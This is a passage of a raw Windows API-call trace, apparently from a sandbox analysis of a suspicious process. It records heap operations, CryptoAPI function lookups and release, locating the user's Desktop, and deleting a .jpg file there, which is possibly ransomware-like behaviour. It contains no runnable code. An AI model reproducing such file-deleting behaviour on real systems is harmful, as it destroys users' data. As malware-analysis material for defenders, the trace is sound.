0x2e54148 [0157.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0157.425] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0157.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0157.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0157.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0157.426] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0157.426] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0157.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0157.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0157.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0157.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0157.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0157.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0157.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0157.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0157.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0157.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0157.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0157.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0157.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0157.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0157.429] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0157.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0157.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0157.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0157.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0157.429] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0157.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0157.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0157.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0157.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0157.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0157.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0157.432] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0157.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0157.432] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0157.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0157.432] FreeLibrary (hLibModule=0x756e0000) returned 1 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.432] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0157.432] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0157.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0157.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0157.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0157.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0157.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0157.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0157.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0157.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0157.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0157.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0157.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0157.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.434] CloseHandle (hObject=0x2d0) returned 1 [0157.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0157.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0157.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0157.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0157.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0157.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0157.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0157.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0157.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0157.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0157.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0157.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0157.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0157.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0157.437] CloseHandle (hObject=0x2a0) returned 1 [0157.586] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0157.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0157.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0157.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0157.589] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0157.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0157.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0157.589] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0157.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0157.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0157.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0157.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0157.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0157.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0157.590] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HCYfZCy ufaMx.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HCYfZCy ufaMx.jpg", lpFilePart=0x8cedf4*="HCYfZCy ufaMx.jpg") returned 0x29 [0157.590] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HCYfZCy ufaMx.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\hcyfzcy ufamx.jpg")) returned 0x20 [0157.590] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HCYfZCy ufaMx.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2cb6eb0, ftCreationTime.dwHighDateTime=0x1d5e786, ftLastAccessTime.dwLowDateTime=0x312da960, ftLastAccessTime.dwHighDateTime=0x1d5e2e2, ftLastWriteTime.dwLowDateTime=0x312da960, ftLastWriteTime.dwHighDateTime=0x1d5e2e2, nFileSizeHigh=0x0, nFileSizeLow=0xa57e, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HCYfZCy ufaMx.jpg", cAlternateFileName="HCYFZC~1.JPG")) returned 0xa87650 [0157.591] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HCYfZCy ufaMx.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\hcyfzcy ufamx.jpg")) returned 1 [0157.594] FindNextFileW (in: hFindFile=0xa87650, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2cb6eb0, ftCreationTime.dwHighDateTime=0x1d5e786, ftLastAccessTime.dwLowDateTime=0x312da960, ftLastAccessTime.dwHighDateTime=0x1d5e2e2, ftLastWriteTime.dwLowDateTime=0x312da960, ftLastWriteTime.dwHighDateTime=0x1d5e2e2, nFileSizeHigh=0x0, nFileSizeLow=0xa57e, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HCYfZCy ufaMx.jpg", cAlternateFileName="HCYFZC~1.JPG")) returned 0 [0157.594] FindClose (in: hFindFile=0xa87650 | out: hFindFile=0xa87650) returned 1 [0157.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0157.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0157.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0157.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0157.596] 